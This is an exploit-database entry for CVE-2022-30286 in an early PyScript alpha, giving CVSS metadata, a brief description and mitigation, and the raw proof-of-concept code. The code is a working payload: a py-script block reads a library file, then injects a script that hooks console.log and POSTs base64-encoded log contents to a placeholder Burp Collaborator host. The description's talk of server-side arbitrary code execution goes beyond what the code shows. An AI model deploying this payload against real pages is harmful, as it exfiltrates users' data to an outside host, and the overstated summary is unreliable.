PyScript Remote Emscripten VMemory Python libraries Source Codes Read

vendor:

PyScript

by:

Momen Eldawakhly

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: PyScript

Affected Version From: 2022-05-04-Alpha

Affected Version To: 2022-05-04-Alpha

Patch Exists: YES

Related CWE: CVE-2022-30286

CPE: a:pyscript:pyscript

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu Apache Server

2022

PyScript Remote Emscripten VMemory Python libraries Source Codes Read

This exploit allows an attacker to execute arbitrary code on a vulnerable PyScript server. The exploit uses the open() function to read the contents of the tasks.py file, which is then printed to the console. The attacker then uses a script tag to inject malicious code into the console.logs array, which is then sent to a remote server via a POST request.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the server is running the latest version of PyScript and that all security patches are applied.

Source

Exploit-DB raw data:

# Exploit Title: PyScript Remote Emscripten VMemory Python libraries
Source Codes Read
# Date: 5-9-2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://pyscript.net/
# Software Link: https://github.com/pyscript/pyscript
# Version: 2022-05-04-Alpha
# Tested on: Ubuntu Apache Server
# CVE : CVE-2022-30286

<py-script>
x = "CyberGuy"
if x == "CyberGuy":
    with open('/lib/python3.10/asyncio/tasks.py') as output:
        contents = output.read()
        print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script>